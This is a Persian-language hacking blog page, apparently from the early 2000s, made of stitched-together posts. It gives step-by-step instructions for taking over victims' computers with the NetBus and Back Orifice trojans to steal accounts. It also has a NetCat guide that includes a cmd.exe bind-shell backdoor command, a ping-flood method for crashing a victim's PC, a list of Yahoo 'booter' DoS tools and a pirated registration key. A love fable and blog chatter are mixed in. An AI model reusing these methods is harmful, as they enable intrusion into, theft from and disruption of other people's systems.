دزدیدن اکونت از قربانی
سلام امروز یکی از روشهای نفوذ به سیستم و دزدیدن پسسورد را توضیح میدم . قبل از شروع این مقاله باید بگم که دزدیدن Account کار واقعا غیر انسانی میباشد و این مقاله را هم با کمی شک و تردید نوشتم . در ضمن اگه واقعا با این قیمتهای اینترنت یکی رو تصور کنید که با سختی یک کارت میخره و شما اونو بدزدین باید بگم واقعا براتون متاسفم ! من این روش را خیلی کلی و خلاصه توضیح میدم .
ما امروز با برنامه های زیر کار میکنیم که همشون در خود ویندوز وجود دارند :
Wingate,Netbus,Bo, Telnet
فرض که قربانی خودمون را در یاهو یا هر جای دیگه پیدا کردیم حالا باید IP اونو بدست اورده و Wingate رو باز کنید در جایی که HOST NAME نوشته شده ادرس ای پی قربانی رو میدیم و در قسمت بعدی به Scan port رفته و Defualt برنامه که Port 23 هست به 12345 تغییر میدیم و گزینه سوم که try to open port Only هست را انتخاب کرده و اسکن را بزنید
البته در اینجا میتونید از یه RANGE IP استفاده کنید هم میتونید ای پی قربانی رو بدهید و در صورت باز بودن پرت مراحل بعدی را اجرا کنید . حالا ما فرض رو بز این میذاریم که یه Range ip دادیم . بعد از پایان اسکن شما با قسمتی بنام SERVER FOUND مواجه میشوید که یکسری ای پی را با پرت های باز مورد نظر شما پیدا کرده در ادامه یکی از ای پی ها را به دلخواه انتخاب کنید .
در قسمت بعدی NETBUS را باز کرده و در جای Hostname/IP ای پی مورد نظر را وارد کنید و در ادامه ی کار اگر از شما پسسورد بخواهد باید از Telnet استفاده کنید و اگر نخواهد که کار تقریبا تمومه . حالا فرض میکنیم که پسسورد خواست باید مراحل زیر را طی کنید:
به قسمت RUN رفته و CMD را اجرا کرده و بعد Telnet را اجرا کنید و ای پی را نوشته و بعد از پرت 12345 استفاده کنید در پنجره Netbus برای کرک پسوورد این نوشته را وارد کنید: Password;1;123serverPWD;Y4hoo
شما میتونید پسورد دیگه ای هم بذارید حالا با Netbus دوباره وصل شده و پسورد را Y4hoo میزنید
همه چیز در دست شماست :)
حالا به قسمت File Manager رفته و سرور را به سیستم طرف ارسال کنید و در قسمتی که از شما پرسید سرور را به کجا بفرستم شما ادرس C:Windows را میدهید .و قسمت دانلود را میبندیم . حالا کارمون با Netbus تموم شد .
حالا به BACK ORFICE میریم و در قسمت Target Host ای پی طرفو میزنیم و پرت 12345 و باز در قسمت بعدی پسورد را زده و SEND را میزنیم
با این روش کارهای زیادی میشه انجام داد !
NetCat چاقوی همه کاره سویسی
میتوان گفت هیچ یک از حملات شبکه ای بدون نام بردن از NetCat کامل نخواهد بود. این برنامه میتواند هم برای مدیران سیستم و هم برای مهاجمان مورد استفاده قرار بگیرد. NetCat در ابتدا توسط Hobbit نوشته شد و در اوایل سال 1996 منتشر شد که البته برای سیستم های Unixنوشته شده بود, و در سال 1998, Weld Pond نسخه ای برای ویندوز را ایجاد کرد.
NetCat مثل یک ابزار شبکه ای همه منظوره است که برای ارسال یا دریافت داده ها از هر پورت TCP یا UDP به هر پورت UDP یاTCP به کار میرود. همچنین میتوان به عنوان ,Port scanner Backdoor ,Port listener ,downloda, uploader و... استفاده کرد.
حال با چند مثال به بررسی چند کاربرد این برنامه میپردازیم.
Port scanning
برای اسکن کردن پورت های باز (پورت های در حالت listening) یک سیستم خط زیر را
به کار میبریم:
nc –v –w 2 –z [target] 10-100
در اینجا target نام یا IP سیستمی که می خواهیم اسکن کنیم است.
سویچ -v اطلاعاتی درباره اتصال میدهد.
سویچ -wزمان استفاده شده برای ایجاد یک اتصال را محدود میکند.
سویچ-z نیز از ارسال هر گونه داده جلوگیری میکند و باعث سریعتر شدن اسکن میگردد.
در این حالت nc تمام پورت های باز سیستم را که بین 1 تا 100 هستند اسکن میکند و نام پورت های معروفی مثل 21 یا 23 که پورت های FTP و Telnet می باشند را نیز نمایش میدهد.
البته NetCat وسیله سریعی برای پورت اسکنینگ نیست و برای اینکار برنامه ای مانند Nmap بهتر عمل میکند.
Connect to Port
برای اتصال به یک پورت از یک سیستم میتوان از خط زیر استفاده کرد:
nc –v –n [target] [port number]
با استفاده از سویچ –n NetCat فقط ادرس هایIP عددی را می پذیرد.
از این دستور میتوان به جای telnet در ویندوز استفاده کرد که هم باعث خوانا شدن نوشته ها میشود و همچنین پایدارتر از telnet است.
Backdoor
یکی از کاربرد های دیگر nc . استفاده از ان به عنوان Backdoor است. برای این کار خط زیر را اجرا میکنیم:
nc –L –p [port number] –d –e [cmd.exe]
سویچ –L nc را در حالت listen راه می اندازد
سویچ-p شماره پورتی را که میخواهید به ان وصل شوید مشخص میکند.
سویچ –d نتکت را در حالت جدا از کنسول اجرا میکند.
سویچ –e برنامه ای را که شما مشخص کرده اید اجرا میکند.
در اینجا port number شماره پورت است که میتواند هر پورتی باشد (پورت رزرو نشده) و شما میخواهید به ان پورت وصل شوید.
(Command prompt) cmd.exe هم برنامه ای است که پس از اتصال به nc روی آن پورت اجرا خواهد شد. در این قسمت اگر برنامه ای که میخواهید پس از وصل شدن اجرا شود در Directory nc نباشد باید نام درایو و directory آن را هم بنویسید:
nc –L –p 5566 –d –e c:winntsystem32cmd.exe
در این حالت nc روی پورت 5566 در حالت listening قرار میگیرد و به محض برقراری ارتباط cmd.exe را روی این پورت فعال میکند.
File Transfering
از کاربردهای دیگر این برنامه انتقال فایل بین دو سیستم است. بسیاری از شبکه ها جلوی FTP را میگیرند یا اینکه به دلیلی شما نمیتوانید از TFTP استفاده کنید. میتوان به وسیله nc فایل را با استفاده از پورت TCP و UDP منتقل کرد.
برای این کار باید nc را در حالت listen در سیستم مقصد راه انداخته و خروجی ان را به یک فایل منتقل کنیم. در سیستم مبدا نیز ان را در حالت client قرار میدهیم تا به سیستم مقصد روی پورت مورد نظر وصل شود و فایل وروی را منتقل میکنیم.
کامپیوتر مبدا:
client pc(recive file): nc –l –p [port] > [file]
کامپیوتر مقصد:
Srver pc(sending file): nc [client-IP] [port] < [file]
با به کار بردن سویچ –u فایل به صورت UDP انتقال میابد.
برای مثال میخواهیم فایل hack.htm را به کامپیوتری با IP 192.168.0.1 بفرستیم:
روی کامپیوتر مقصد این خط را مینویسیم:
nc –l –p 5566 > hack.htm
پورت 5566 را به صورت دلخواه انتخاب کرده ایم.
روی کامپیوتر خود نیز این خط را مینویسیم:
nc 192.168.0.1 < hack.htm
همیشه اول باید nc را روی کامپیوتر مقصد اجرا کنید.
یک روش برای ریست کردن قربانی
امروز طریق Restart کردن قربانی را به شما یاد میدم . در این روش شما یاد میگیرین که چگونه با ایجاد Fatal Eror بر روی قربانی سیستم او را ReBoot کنید
این روش فقط بر روی ویندوزهای 9x , 2000 , nt قابل اجرا میباشد میتوانید از برنامه های مختلفی استفاده کنید اما من Winnuke را پیشنهاد میکنم حالا به طریق زیر عمل کنید :
ای پی مورد نظر را پیدا کرده و به آن Ping کرده و از وجود ان اطمینان حاصل کنید . در ادامه از طریق DOS دستور زیر را وارد
کنید Ping -v igmp 192.168.0.199 -l 1500 -t
سوییچ v به ما اجازه ی استفاده از پروتوکولهای مختلف میدهد -l حجم پکتها و -t فرستادن این پکتها بدون مکس را انجام میدهم زمانی که با پیغام Target is unreachable مواجه شدید کار با موفقیت انجام گرفته
عبور از فیلتر
اینجا رو کلید کنینبابا ما هم شدیم..
آخیش ...این عدد ۱۰۰۰۰ تا داشت منو دیونه میکرد هی منتظر بودم امار برسه به ۱۰۰۰۰ تا که بالاخره رسید
بابا یه تبریک به خودم میگم که اصلا فکر نمیکردم یه روزی من یه وبلاگ بزنم . آمارش برسه به ۱۰۰۰۰ تا واسم عقده شده بود...
بابا اینکاره ....
خوب بابا بریم سر اصل مطلب من واسه این وبلاگ احتیاج به همکار دارم که تو زمینه های مختلف وارد باشند و بتونن و مایل باشن که همکاری داشته باشند و با هم کار کنیم تا یه وبلاگ خوب و موفق داشته باشیم که همه به تونن ازش استفاده کنن
هر کی اماده همکاری باشه ما دستشو از همینجا می فشاریم ...
در زمینه داستان نویسی آموزش هک کرک عشقی سیاسی خلاصه می خوایم بزنیم و همه چی بزاریم و یه شلم شوربا حسابی را بندازیم ...
یا حق !
نجات عشق...
روزی روزگاری در یک جزیره زیبا تمام حواس زندگی می کردند.شادی،غم،غرور،عشق و...روزی خبر رسید که به زودی جزیره به زیر آب خواهد رفت.پس همه ساکنین قایقهای خود را مرمت کرده و جزیره را ترک گفتند.اما عشق چون عاشق جزیره بود خواست تا آخرین لحظات در جزیره بماند وقتی جزیره به زیر آب می رفت عشق از ثروت که با قایقی عظیم و زیبا جزیره را ترک می کرد خواست که با او همسفر شود.
ثروت گفت :خیر نمی توانم.من مقدار زیادی طلا و جواهر دارم و جایی برای تو نمی ماند.
پس عشق از غرور که با کرجی زیبایی راهی مکان امنی بود کمک خواست .
غرور گفت:خیر نمی توانم.تمام بدن تو خیس شده وکثیف شده ای و قایق مرا کثیف می کنی.
غم در نزدیکی عشق بود پس عشق از غم خواست که او را کمک کند.
غم گفت:خیر نمی توانم.و با صدایی حزن آلود گفت که آه عشق من خیلی ناراحتم و احتیاج به تنهایی دارم.
پس عشق شادی را صدا زد اما شادی آنقدر غرق در شادی و هیجان بود که حتی صدای او را هم نشنید.
ناگهان صدایی مسن گفت:بیا عشق من تو را خواهم برد.
عشق آنقدر خوشحال شده بود که حتی فراموش کرد نام یاری دهنده اش را بپرسدو سریع خود را به قایق او انداخت و جزیره را ترک کرد.وقتی که به جای امنی رسیدند قایق به راه خود ادامه داد ورفت. عشق تازه فهمید که چقدر به او بدهکار است ناراحت از آن که او رفته بود از علم پرسید که :او که بود که مرا نجات داد؟
علم پاسخ داد :او زمان بود.
عشق گفت:چرا به من کمک کرد؟
علم لبخندی زد و گفت که :"زیرا تنها زمان قادر به درک عظمت عشق است"
بوتر
 Critical Error 2  Description: Booter... Version: Filesize: 0 bytes Added on: 27-Aug-2003 Downloads: 313 HomePage | Rate Resource | Details Fuck Tunnel 2b Description: Nice Y Tunnel Booter Version: Filesize: 0 bytes Added on: 18-Aug-2003 Downloads: 892 HomePage | Rate Resource | Details Liquid Boot Description: Nice...Boots Y Tunnels Version: Filesize: 0 bytes Added on: 18-Aug-2003 Downloads: 494 HomePage | Rate Resource | Details Meatbox 3 Description: Still Kickin ass... Version: Filesize: 0 bytes Added on: 18-Aug-2003 Downloads: 237 HomePage | Rate Resource | Details Meatbox Silver Description: Boots All Y Tunnels Version: Filesize: 0 bytes Added on: 18-Aug-2003 Downloads: 351 HomePage | Rate Resource | Details Mothership 5.5 Description: Snoopys latest and greatest release...Enjoy Version: Filesize: 0 bytes Added on: 22-Aug-2003 Downloads: 398 HomePage | Rate Resource | Details Smasher 5 Description: Smasher 5...lol...boots all tunnels i think? Version: Filesize: 0 bytes Added on: 23-Aug-2003 Downloads: 276 HomePage | Rate Resource | Details Tiny Proto 3 Description: boots all tunnels Version: Filesize: 0 bytes Added on: 23-Aug-2003 Downloads: 407 HomePage | Rate Resource | Details Velocity 2 Description: Boots Tunnel Version: Filesize: 0 bytes Added on: 18-Aug-2003 Downloads: 133 HomePage | Rate Resource | Details WMP (Wheres My Powder) Description: Tunnel Booter... Version: Filesize: 0 bytes Added on: 28-Aug-2003 Downloads: 272 HomePage | Rate Resource | Details
|
آنتی بوتر یاهو تونل
سلام
بابا
اینم یاهو تونل ۲۲۲ ytunnel 222
دانلود
اینم کد رجیستریش
gkokn-098bf0-011dq6-n8ym3e-0u69kf
برین حالشو ببرین!!!!!!